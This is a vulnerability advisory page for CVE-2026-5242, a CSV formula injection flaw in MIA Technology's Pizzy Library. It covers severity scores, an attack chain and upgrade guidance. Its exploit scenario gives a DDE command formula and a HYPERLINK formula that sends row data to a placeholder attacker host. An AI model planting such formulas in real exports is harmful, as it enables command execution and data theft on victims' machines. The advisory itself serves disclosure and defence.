Skip to main content

Pizzy Library CVE-2026-5242

| EUVDEUVD-2026-36719 HIGH
Improper Neutralization of Formula Elements in a CSV File (CWE-1236)
2026-06-15 TR-CERT GHSA-qv7c-w6cp-c775
8.8
CVSS 3.1 · NVD
Share

Severity by source

Vendor (TR-CERT) PRIMARY
HIGH
qualitative
NVD
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
9.0 CRITICAL

Authenticated input injection (PR:L) over the network; exploitation requires victim to open the CSV (UI:R) and impact lands on the spreadsheet host, not Pizzy (S:C), with full CIA impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (TR-CERT).

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Patch available
Jun 15, 2026 - 16:01 EUVD
Analysis Generated
Jun 15, 2026 - 14:31 vuln.today

DescriptionNVD

Improper neutralization of formula elements in a CSV file vulnerability in MIA Technology Inc. Pizzy Library allows Code Injection.

This issue affects Pizzy Library: from 1.0.0.26250 before 1.3.9.26250.

AnalysisAI

CSV formula injection in MIA Technology's Pizzy Library (versions 1.0.0.26250 through 1.3.9.26250) allows authenticated attackers to inject malicious formula elements into generated CSV files, leading to code execution when the file is opened in a spreadsheet application. The flaw is rated CVSS 8.8 and was reported by TR-CERT, though no public exploit identified at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to Pizzy-backed app
Delivery
Inject formula payload into exportable field
Exploit
Trigger CSV export generation
Install
Victim opens CSV in Excel
C2
Spreadsheet evaluates formula/DDE
Execute
Execute command in victim context
Impact
Exfiltrate data or pivot

Vulnerability AssessmentAI

Exploitation Requires (1) authenticated write access to a field that Pizzy Library subsequently serializes into a CSV export, consistent with CVSS PR:L; (2) a victim who downloads the generated CSV and opens it in a spreadsheet application (Excel, Calc, Sheets) that evaluates formulas - despite UI:N in the vector, CWE-1236 exploitation is gated on this victim action; and (3) the spreadsheet client either auto-enabling formulas/DDE or the user clicking through the protected-view warning. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H rates this 8.8 (High), but the vector is internally inconsistent with a classic CSV injection: real exploitation of CWE-1236 requires the victim to open the exported file in a spreadsheet client, which would normally warrant UI:R, and the impact lands on the downstream viewer rather than the Pizzy host (suggesting a scope change). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated low-privilege user of an application that embeds Pizzy Library submits a field value such as =cmd|'/c calc'!A1 or =HYPERLINK("http://attacker/?"&A1,"Click") into a record that will later be exported. A finance or admin user downloads the resulting CSV and opens it in Excel, at which point the formula executes, leaking row data over HTTP or invoking DDE to run an arbitrary command in the victim's session.
Remediation Upgrade Pizzy Library to version 1.3.9.26250 or later, the first fixed release per the affected-range metadata; consult the TR-CERT bulletin at https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0383 for vendor coordination details. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all systems and applications using Pizzy Library versions 1.0.0.26250-1.3.9.26250; publish security advisory cautioning users against opening CSV files from untrusted sources. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-5242 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy